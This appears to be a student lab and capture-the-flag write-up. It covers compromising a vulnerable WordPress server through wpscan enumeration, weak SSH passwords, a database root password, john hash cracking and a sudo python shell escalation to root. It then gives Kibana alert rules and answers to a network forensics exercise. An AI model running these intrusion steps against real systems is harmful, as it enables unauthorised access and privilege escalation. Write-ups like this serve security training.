Exploit Vulnerable WordPress Installation, Set Alerts in Kibana

Exposed Services

Nmap scan results for each machine reveal the below services and OS details:

This scan identifies the services below as potential points of entry:

The following vulnerabilities were identified on each target:

Target 1

  • Unsalted Password Hashes Easily Reversed
  • Basic Password for Michael’s Account
  • Password Hashes Accessible
  • Wordpress Enumeration


The Red Team was able to penetrate Target 1 and retrieve the following confidential data:

Target 1

  • Flag1.txt: b9bbcb33ellb80be759c4e844862482d

Exploit Used

  • WPS Scan to enumerate users
  • wpscan — url — enumerate u
  • Ssh [email protected]
  • Pw michael
  • cd ../..
  • cd /var/www
  • ls
  • grep -RE flag html
  • Flag2.txt: fc3fd58dcdad9ab23faca6e9a3e581c

Exploit Used

  • Continuing with WPS Scan info
  • ssh [email protected]
  • Pw michael
  • cd ../..
  • cd /var/www
  • ls
  • cat flag2.txt
  • Flag3.txt: afc01ab56b50591e7dccf93122770cd2

Exploit Used

  • Continuing with WPS Scan info and Accessing MySQL
  • mysql -u root -p
  • password: R@v3nSecurity
  • show databases;
  • use wordpress;
  • show tables;
  • select * from wp_posts;
  • Flag4.txt: 715dea6c055b9fe3337544932f2941ce

Exploit Used

Crack and Unsalted Password Hash and Escalate Privileges with Python

  • mysql -u root -p
  • password: R@v3nSecurity
  • show databases;
  • use wordpress;
  • show tables;
  • select * from wp_users;
  • Switch to Kali Machine
  • john wp_hashes.txt
  • john -show wp_hashes.txt
  • ssh [email protected]
  • password: pink84
  • sudo python -c ‘import pty;pty.spawn(“/bin/bash”);’
  • cd /root
  • ls
  • cat flag4.txt

Network Topology

The following machines were identified on the network:


  • Operating System: Debian Kali Linux
  • Purpose: Pen Tester
  • IP Address:


  • Operating System: Ubuntu
  • Purpose: ELK Stack
  • IP Address:

Target 1

  • Operating System: Debian GNU
  • Purpose: WordPress
  • IP Address:


  • Operating System: Ubuntu
  • Purpose: Vulnerable Server
  • IP Address:

Description of Targets

The target of this attack was: Target 1

Target 1 is an Apache web server and has SSH enabled, so ports 80 and 22 are possible ports of entry for attackers. As such, the following alerts have been implemented:

Monitoring the Targets

Traffic to these services should be carefully monitored. To this end, we have implemented the alerts below:

Excessive HTTP Errors

Alert 1 is implemented as follows:

  • Metric: WHEN count() GROUPED OVER top 5 ‘http.response.status_code’
  • Threshold: IS ABOVE 400
  • Vulnerability Mitigated: Brute Force or Enumeration
  • Reliability: This alert is reliable. The code 400 and higher indicates user and server error. When these alerts happen at a high rate it indicates an attack.

HTTP Request Size Monitor

Alert 2 is implemented as follows:

  • Metric: WHEN sum() of http.request.byte OVER all documents
  • Threshold: IS ABOVE 3500
  • Vulnerability Mitigated: Cross Site Scripting and CRLF (Carriage Return Line Feed) or DDOS (Distributed Denial of Service)
  • Reliability: Reliability is average or medium. False positives are possible when there is simply a period of high traffic/HTTP requests.

CPU Usage Monitor

Alert 3 is implemented as follows:

  • Metric: WHEN max() OF system.process.cpu.total.pct OVER all documents
  • Threshold: IS ABOVE 0.5
  • Vulnerability Mitigated: Monitors Usage, can indicate malicious programs running in the background.
  • Reliability: This alert is very reliable because it not only indicates malicious programs, but can also let a user know when resources are being used unnecessarily and can improve efficiency.

Network Forensic Analysis Report

Time Thieves

You must inspect your traffic capture to answer the following questions:

  1. What is the domain name of the users’ custom site?
  • Frank-n-Ted-DC.frand-n-ted.com.
  1. What is the IP address of the Domain Controller (DC) of the AD network?
  1. What is the name of the malware downloaded to the machine?
  • june11.dll
  1. What kind of malware is this classified as?

Vulnerable Windows Machine

  1. Find the following information about the infected Windows machine:
  • Host name: ROTTERDAM-PC
  • IP address:
  • MAC address: 00:59:07:b0:63:a4
  1. What is the username of the Windows user whose computer is infected?
  • matthijs.devries
  1. What are the IP addresses used in the actual infection traffic?
  1. As a bonus, retrieve the desktop background of the Windows host.

Illegal Downloads

  1. Find the following information about the machine with IP address
  • MAC address: 00:16:17:18:66:c8
  • Windows username: elmer.blanco
  • OS Version of Host Name: BLANCO-DESKTOP
  1. Which torrent file did the user download?
  • Betty_Boop_Rythm_on_the_Reservation.avi.torrent

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